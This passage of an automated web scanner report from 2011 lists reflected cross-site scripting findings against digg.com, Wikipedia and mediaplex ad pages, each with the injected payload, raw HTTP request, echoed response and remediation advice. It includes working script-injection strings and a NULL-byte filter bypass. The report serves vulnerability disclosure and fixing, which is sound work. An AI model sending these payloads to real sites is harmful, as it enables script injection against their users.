var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';
var zzhasAd;
...[SNIP]... 172;m=82;w=47;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=63e07"-alert(1)-"00bf0ba6143http://w3.newsmax.com/newsletters/crandall/videog.cfm?PROMO_CODE=CF19-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true ...[SNIP]...
|
5.34. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://digg.com |
| Path: |
/img/badges/16x16-digg-guy.gif |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0015cd3"><script>alert(1)</script>717828749f8 was submitted in the REST URL parameter 1. This input was echoed as 15cd3"><script>alert(1)</script>717828749f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /img%0015cd3"><script>alert(1)</script>717828749f8/badges/16x16-digg-guy.gif HTTP/1.1 Host: digg.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:11:24 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=274235 10.2.128.108 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 17578
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, break ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/img%0015cd3"><script>alert(1)</script>717828749f8/badges/16x16-digg-guy.gif.rss"> ...[SNIP]...
|
5.35. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://digg.com |
| Path: |
/img/badges/16x16-digg-guy.gif |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00602d3"><script>alert(1)</script>0a817cdd92a was submitted in the REST URL parameter 2. This input was echoed as 602d3"><script>alert(1)</script>0a817cdd92a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /img/badges%00602d3"><script>alert(1)</script>0a817cdd92a/16x16-digg-guy.gif HTTP/1.1 Host: digg.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:11:27 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=291609 10.2.128.119 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 17578
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, break ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges%00602d3"><script>alert(1)</script>0a817cdd92a/16x16-digg-guy.gif.rss"> ...[SNIP]...
|
5.36. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://digg.com |
| Path: |
/img/badges/16x16-digg-guy.gif |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008a997"><script>alert(1)</script>afeedb8a9b5 was submitted in the REST URL parameter 3. This input was echoed as 8a997"><script>alert(1)</script>afeedb8a9b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /img/badges/16x16-digg-guy.gif%008a997"><script>alert(1)</script>afeedb8a9b5 HTTP/1.1 Host: digg.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:11:30 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=319185 10.2.129.97 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 17577
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, break ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges/16x16-digg-guy.gif%008a997"><script>alert(1)</script>afeedb8a9b5.rss"> ...[SNIP]...
|
5.37. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://en.wikipedia.org |
| Path: |
/wiki/Chromium |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %0087638<script>alert(1)</script>6e02d0bd6fe was submitted in the REST URL parameter 2. This input was echoed as 87638<script>alert(1)</script>6e02d0bd6fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/Chromium%0087638<script>alert(1)</script>6e02d0bd6fe HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 12:47:13 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Chromium%0087638<script>alert(1)</script>6e02d0bd6fe Content-Length: 5381 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq60.wikimedia.org X-Cache-Lookup: MISS from sq60.wikimedia.org:3128 X-Cache: MISS from sq60.wikimedia.org X-Cache-Lookup: MISS from sq60.wikimedia.org:80 Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/Chromium%0087638< ...[SNIP]... <p style="font-weight: bold;">To check for "Chromium%0087638<script>alert(1)</script>6e02d0bd6fe" on Wikipedia, see: <a href="//en.wikipedia.org/wiki/Chromium%0087638<script> ...[SNIP]...
|
5.38. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://en.wikipedia.org |
| Path: |
/wiki/Chromium |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00624aa"><script>alert(1)</script>c96737ffef0 was submitted in the REST URL parameter 2. This input was echoed as 624aa"><script>alert(1)</script>c96737ffef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0 HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 12:46:54 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0 Content-Length: 5409 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq78.wikimedia.org X-Cache-Lookup: MISS from sq78.wikimedia.org:3128 X-Cache: MISS from sq76.wikimedia.org X-Cache-Lookup: MISS from sq76.wikimedia.org:80 Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/Chromium%00624aa&qu ...[SNIP]... <a href="//en.wikipedia.org/wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0" title="Wikipedia:Chromium%00624aa"> ...[SNIP]...
|
5.39. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://en.wikipedia.org |
| Path: |
/wiki/List_of_country_calling_codes |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0048712"><script>alert(1)</script>4e011b11c98 was submitted in the REST URL parameter 2. This input was echoed as 48712"><script>alert(1)</script>4e011b11c98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98 HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 12:47:02 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98 Content-Length: 5535 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq66.wikimedia.org X-Cache-Lookup: MISS from sq66.wikimedia.org:3128 X-Cache: MISS from sq62.wikimedia.org X-Cache-Lookup: MISS from sq62.wikimedia.org:80 Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_country_cal ...[SNIP]... <a href="//en.wikipedia.org/wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98" title="Wikipedia:List_of_country_calling_codes%0048712"> ...[SNIP]...
|
5.40. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://en.wikipedia.org |
| Path: |
/wiki/List_of_country_calling_codes |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00935d7<script>alert(1)</script>b1eea4d5111 was submitted in the REST URL parameter 2. This input was echoed as 935d7<script>alert(1)</script>b1eea4d5111 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111 HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 12:47:21 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111 Content-Length: 5507 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq61.wikimedia.org X-Cache-Lookup: MISS from sq61.wikimedia.org:3128 X-Cache: MISS from sq39.wikimedia.org X-Cache-Lookup: MISS from sq39.wikimedia.org:80 Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_country_cal ...[SNIP]... <p style="font-weight: bold;">To check for "List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111" on Wikipedia, see: <a href="//en.wikipedia.org/wiki/List_of_country_calling_codes%00935d7<script> ...[SNIP]...
|
5.41. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f130"-alert(1)-"614655255ec was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:51:59 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5223 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.c ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec"); mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec"); mpck ...[SNIP]...
|
5.42. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32ddb'%3balert(1)//a462f1217a5 was submitted in the mpck parameter. This input was echoed as 32ddb';alert(1)//a462f1217a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D924369732ddb'%3balert(1)//a462f1217a5&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:52:00 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5229 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.c ...[SNIP]... <a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=924369732ddb';alert(1)//a462f1217a5" target="_blank"> ...[SNIP]...
|
5.43. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1b2"><script>alert(1)</script>f9dae9fa5f7 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436972d1b2"><script>alert(1)</script>f9dae9fa5f7&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:51:59 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5298 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=92436972d1b2"><script>alert(1)</script>f9dae9fa5f7" target="_blank"> ...[SNIP]...
|
5.44. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ee5"%3balert(1)//49f4fb4cb03 was submitted in the mpvc parameter. This input was echoed as e5ee5";alert(1)//49f4fb4cb03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5"%3balert(1)//49f4fb4cb03 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:52:00 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5225 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb03"); mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb03"); mpvc = en ...[SNIP]...
|
5.45. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 358a9'%3balert(1)//baf0f6a66bf was submitted in the mpvc parameter. This input was echoed as 358a9';alert(1)//baf0f6a66bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9'%3balert(1)//baf0f6a66bf HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:52:00 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5225 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9';alert(1)//baf0f6a66 ...[SNIP]... <a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9';alert(1)//baf0f6a66bfhttp://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=9243697" target="_blank"> ...[SNIP]...
|
5.46. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/14741/120372/GX1041_AugBanner_728x90.html |
Issue detail
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368e1"><script>alert(1)</script>12c7fa4208a was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
